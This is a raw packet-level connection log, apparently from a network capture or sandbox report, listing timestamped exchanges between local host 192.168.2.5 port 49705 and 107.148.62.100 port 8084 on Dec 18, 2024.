Dec 18, 2024 13:31:56.126127005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.127964973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.128011942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.128067017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.129215002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.129281044 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.129364014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.130564928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.130609035 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.130671024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.146785021 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.146835089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.146883965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.147434950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.147481918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.147483110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.148710966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.148756981 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.148837090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.150085926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.150126934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.150127888 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.151449919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.151494026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.151560068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.152738094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.152785063 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.152786970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.154117107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.154160023 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.154258966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.155453920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.155502081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.155579090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.156817913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.156882048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.156976938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.158083916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.158129930 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.158154011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.159512997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.159554958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.159739017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.160578966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.160624981 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.161007881 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.161102057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.161143064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.162390947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.162627935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.162671089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.162740946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.163942099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.163990974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.164557934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.164695978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.164741039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.165927887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.167460918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.167507887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.167521954 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.168056011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.168109894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.169569016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.169662952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.169709921 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.170008898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.170089960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.170135021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.172260046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.172346115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.172424078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.173022032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.174746990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.174787045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.174798012 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.175152063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.175203085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.177295923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.177367926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.177413940 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.177864075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.179778099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.179810047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.179842949 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.180445910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.180494070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.182142973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.182276964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.182326078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.182719946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.184544086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.184556007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.184618950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.186069012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.186081886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.186115980 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.186573029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.186623096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.188061953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.188168049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.188220024 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.188774109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.190625906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.190696955 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.190721989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.191337109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.191390038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.192955971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.193026066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.193069935 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.193614006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.195385933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.195436954 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.195456028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.195957899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.196007967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.197689056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.197814941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.197865009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.198348045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.245048046 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.263113976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.263134003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.263231039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.263351917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.263468027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.263516903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.264813900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.265043974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.265096903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.266022921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.266140938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.266187906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.267189980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.267323017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.267395020 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.268508911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.268537998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.268587112 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.269848108 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.270056963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.270104885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.271254063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.271387100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.271456957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.272547007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.272661924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.272707939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.274152994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.274168968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.274214983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.275763988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.285110950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.285130024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.285200119 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.285459995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.285504103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.285648108 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.286859035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.286892891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.286899090 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.288499117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.288563967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.306885958 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.307039022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.307198048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.307475090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.307490110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.307564974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.308995008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.309071064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.309118032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.310024977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.310404062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.310448885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.310467005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.311525106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.311569929 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.311631918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.312747002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.312791109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.312869072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.313529968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.313579082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.313743114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.313858986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.313905954 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.314467907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.314611912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.314659119 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.315324068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.315335035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.315387011 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.350987911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.351023912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.351093054 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.351289988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.352452993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.352526903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.352566004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.353003025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.353055000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.354839087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.355043888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.355093956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.355242014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.357384920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.357436895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.357469082 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.357708931 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.357755899 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.360035896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.360141993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.360198021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.360280037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.362256050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.362267971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.362304926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.362384081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.362432957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.362466097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.364634037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.364702940 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.364712000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.364989042 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.365036011 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.368371964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.368396997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.368451118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.368515968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.369484901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.369541883 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.369596004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.369771957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.369821072 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.371934891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.372015953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.372065067 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.372251987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.374701977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.374775887 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.374878883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.375108004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.375154972 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.377228975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.377248049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.377296925 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.377607107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.379802942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.379853964 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.379883051 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.380182981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.380232096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.382057905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.382076979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.382118940 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.382581949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.384430885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.384478092 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.384661913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.384677887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.384726048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.386662960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.386722088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.386811018 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.388000965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.388406992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.388425112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.388488054 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.390403032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.390459061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.390502930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.390707016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.390757084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.392741919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.392998934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.393089056 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.393120050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.395298958 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.395328045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.395345926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.396368980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.396414995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.396739960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.396754980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.396815062 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.399034977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.399275064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.399292946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.399333000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.401489973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.401540041 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.401632071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.401812077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.401865005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.404253960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.404356956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.404406071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.404619932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.406610966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.406657934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.406935930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.406961918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.407026052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.409179926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.409198046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.409244061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.409368038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.411725998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.411784887 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.411787987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.411907911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.411969900 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.455029011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.455096960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.455162048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.455372095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.455389023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.455451965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.456085920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.456100941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.456145048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.456872940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.456898928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.456940889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.457505941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.457582951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.457626104 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.458355904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.458420038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.458462954 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.459062099 CET	8084	49705	107.148.62.100	192.168.2.5
